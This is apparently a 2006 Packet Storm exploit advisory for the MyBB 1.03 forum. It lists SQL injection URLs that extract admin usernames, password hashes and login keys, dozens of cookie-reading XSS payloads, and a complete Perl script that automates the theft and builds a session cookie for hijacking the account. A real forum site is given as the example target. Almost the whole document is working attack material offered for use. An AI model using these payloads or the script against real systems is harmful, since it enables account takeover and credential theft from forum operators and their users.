MyBB-1.03.txt

2006-02-14T00:00:00
ID PACKETSTORM:43864
Type packetstorm
Reporter HACKERS PAL
Modified 2006-02-14T00:00:00

Description

                                        
                                            `Multible Injections in MyBB 1.03  
  
All injections and vulnerabilities discovered by : HACKERS PAL  
  
two days ago i thought to download the new Mybb forum new version files .. and there were the desaster  
  
there is many xss and sql injections in the new protected version ...  
  
and i made a exploit which get the table prefix and give you the admin information and the cookie which you should make value ..  
  
the mods forum is injected with all the vulnerabilities but the main forum and some of od versions are not  
  
url : http://mods.mybboard.com/forum/index.php  
  
0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0  
  
SQL injections  
in misc.php  
  
Get The Admin username  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
Get The Admin password  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
Get The Loginkey  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
in private.php  
  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey  
  
in showteam.php  
user name  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
password  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
loginkey  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
in usercp.php  
user name  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
  
user password  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
  
user loginkey  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
----------------------------------------------------  
xss injections  
  
in any file in the forum like forumdisplay.php?fid=1  
  
  
after the link  
  
add  
&"></a><script>alert(document.cookie);</script>&  
  
  
-----------------------------------------------------  
if the forum is closed  
global.php?bbclosedwarning=<script>alert(document.cookie);</script>  
  
in index.php  
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
  
in calender.php  
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=<script>alert(document.cookie);</script>  
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=<script>alert(document.cookie);</script>  
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(document.cookie);</script>  
  
in editpost.php  
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie);</script>  
  
in forumdisplay.php  
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie);</script>  
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
  
this vulnerabilities works only if the forum were threads forum  
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>  
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
  
in memberlist.php  
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</script>  
  
in misc.php  
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie);</script>  
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.cookie);</script>  
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cookie);</script>  
  
in online.php  
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.cookie);</script>  
  
in portal.php  
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</script>  
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>  
  
in private.php  
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</script>  
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(document.cookie);</script>  
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(document.cookie);</script>  
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document.cookie);</script>  
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document.cookie);</script>  
  
in showteam.php  
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</script>  
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</script>  
  
in showthread.php  
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</script>  
  
if there is a poll in the thread  
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cookie);</script>  
  
in stats.php  
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</script>  
  
in usercp.php  
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.cookie);</script>  
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>  
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>  
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(document.cookie);</script>  
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.cookie);</script>  
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cookie);</script>  
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(document.cookie);</script>  
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert(document.cookie);</script>  
  
-----------------------------------------  
  
--- The Exploit ---  
  
#!/bin/env perl  
#//-------------------------------------------------------------#  
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #  
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #  
#// Special Greets For SG (SecurityGurus) Team And Members #  
#// http://WwW.SoQoR.NeT #  
#//-------------------------------------------------------------#  
  
use LWP::Simple;  
print "\n#####################################################";  
print "\n# MyBB Forum Exploit By : HACKERS PAL #";  
print "\n# Http://WwW.SoQoR.NeT #";  
if(!$ARGV[0] or !$ARGV[1]) {  
print "\n# -- Usage: #";  
print "\n# -- perl $0 [Full-Path] [User ID] #";  
print "\n# -- Example: #";  
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";  
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";  
print "\n#####################################################";  
exit(0);  
}  
else  
{  
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";  
print "\n#####################################################";  
$web=$ARGV[0];  
$id=$ARGV[1];  
$url = "showteam.php?GLOBALS[]=1&comma=/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/FROM (.*)users u WHERE/;  
$prefix=$1;  
if(!$1)  
{  
$prefix="mybb_";  
}  
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
print "\n[+] Connected to: $ARGV[0]\n";  
print "[+] User ID is : $id ";  
print "\n[+] Table Prefix is : $prefix";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";  
print "\n[-] Unable to retrieve User Name\n" if(!$1);  
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";  
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);  
print"\n[!] Watch out ... The Cookie Value is comming\n";  
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";  
print "[-] Unable to retrieve Login Key\n" if(!$1);  
}  
  
# WwW.SoQoR.NeT  
`